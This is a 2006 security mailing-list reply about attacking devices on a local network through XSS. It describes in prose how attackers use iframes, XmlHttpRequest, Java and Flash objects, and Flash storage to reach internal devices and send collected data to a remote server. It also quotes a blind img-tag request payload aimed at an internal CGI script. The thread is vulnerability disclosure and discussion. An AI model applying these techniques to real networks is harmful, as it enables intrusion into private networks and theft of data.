Re: [Full-disclosure] Attacking the local LAN via XSS

In most cases JavaScript is required. Flash 7 has the flexibility to
perform cross domain requests, however this is fixed in Flash 8. Java
Object are quite the same in that respect. Of course, in certain
situations it might be possible to trick the browser.

The proposed scenario takes advantage of the fact the Internal device
is vulnerable to XSS attack. In this case all the attacker needs to do
is to make an iframe call to the vulnerable URL in order to inject
JavaScript code withing the device domain. When this is achieved the
browser happily will allow you to make XmlHttpRequests. In the Ajax
world this is the most well proven technology. Both POST and GET are

Performing PUT, HEAD, DELETE and other server methods are possible as
well. All the attacker needs to do is to perform iframe call to the
vulnerable to XSS url that will embed Java Object which will perform
the desired operations. More sophisticated attack vectors are also
possible (tcp, udp, icmp scanning, sockets, etc...).

In case the current browser has outdated Flash plugin, the malicious
site can perform the desired attack without the need of the internal
device being vulnerable to XSS. However this will work in very closed
environments because most of the time plugin updates are enforced on
regular basis.

In case sensitive information needs to be transferred from the local
LAN to a remote collection point a few other methods can be employed.
A Flash object can store a lot of information by using the AJAX
MAssive Storage System (AMASS) technique
<>. When the
storage reach a critical mass (99K) the content can be automatically
dumped at the remote collection point via POST. All this can be
achieved from Flash (all versions). Of course the remote collection
point needs to have "crossdomain.xml" file located in the document
root to allow cross domain requests in case the Flash plugin is in its
latest version.

All of these checks can be performed at runtime. The attacker can
detect what version of Flash is currently used and whether Java is
enabled. Based on that the best attack vector will be selected.
Moreover, this can be trivially achieved by using well known AJAX
based libraries.

On 8/4/06, Georgi Guninski <guninski@xxxxxxxxxxxx> wrote:
On Fri, Aug 04, 2006 at 12:35:48AM +0100, pdp (architect) wrote:
> For that purpose three prerequisites are needed:
> 1. page that is controlled by the attacker, lets call it
> 2. border router vulnerable to XSS

do you need javascript in all cases? unless you badly need http POST, doing
blind <img src=http://ip/cgi-bin/readmailreallyfast>, iframe src=, may have
interesting side effects.

where do you want bill gates to go today?


pdp (architect)

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Relevant Pages

  • Re: Cleaning a computer - any other views here?
    ... but it isn't a likely attack route. ... The method varies ... then look into your motherboard's flash update ... And don't forget your tinfoil helmet to keep aliens from controlling ...
  • Re: OK, this is driving my batfuck crazy.
    ... expensive camera and flash them. ... The riders, blinded by the flash, will ... run around and only attack you if they recover, ...
  • Re: AT&T to limit unlimited data plans to 5GB a month?
    ... because following a url redirection such as ... tinyurl's and such is an invitation to attack on the worst end, ... For example, the new Flash ...
  • UPnP attack
    ... Basically it notes a form of attack using port forwarding by use of ... Flash and Javacode. ...
  • Re: UPnP attack
    ... I just got this from a Tech Republic newsletter: ... Basically it notes a form of attack using port forwarding by use of ... Flash and Javacode. ...